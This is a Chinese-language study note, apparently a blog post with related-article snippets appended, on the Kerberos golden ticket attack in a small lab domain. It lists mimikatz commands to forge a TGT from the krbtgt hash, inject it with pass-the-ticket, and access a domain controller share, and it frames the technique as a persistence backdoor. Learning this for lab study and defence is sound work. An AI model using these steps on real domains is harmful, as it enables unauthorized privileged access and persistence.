金票據(golden ticket):偽造票據授予票據(tgt),也被稱為認證票據。
krbtgt賬戶:每個域控制器都有乙個「krbtgt」的使用者賬戶,是kdc的服務賬戶,用來建立票據授予服務(tgs)加密的金鑰。
與其說是一種攻擊方式,不如說是一種後門,當域控許可權掉後,再重新獲取許可權。
環境域控2k3,ip:10.0.2.15
域內主機07,ip:10.0.2.16
kerberos :: golden:建立**
user:jiujiu99偽造的使用者
domain:jiu.com網域名稱
sid:id域中sid
krbtft:hash在域控中匯出的hash
ppt:將偽造的票據插入到記憶體中以供使用
其中也可以分步建立票據與匯入
kerberos::purge
kerberos::golden /admin:administrator /domain:域 /sid:sid /krbtgt:hash值 /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
dir \jiu.com\c$
域滲透之金票據學習 md
金票據 golden ticket 偽造票據授予票據 tgt 也被稱為認證票據。krbtgt賬戶 每個域控制器都有乙個 krbtgt 的使用者賬戶,是kdc的服務賬戶,用來建立票據授予服務 tgs 加密的金鑰。與其說是一種攻擊方式,不如說是一種後門,當域控許可權掉後,再重新獲取許可權。環境域控2k3...
kerberos 票據 域滲透之黃金票據的實際利用
先介紹下kerberos協議 kerberos是一種由mit 麻省理工大學 提出的一種網路身份驗證協議。它旨在通過使用金鑰加密技術為客戶端 伺服器應用程式提供強身份驗證。在kerberos協議中主要是有三個角色的存在 1 訪問服務的client 使用者的機器客戶端 2 提供服務的server 服務端...
域滲透的金之鑰匙
mickey 2015 10 13 11 33 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有...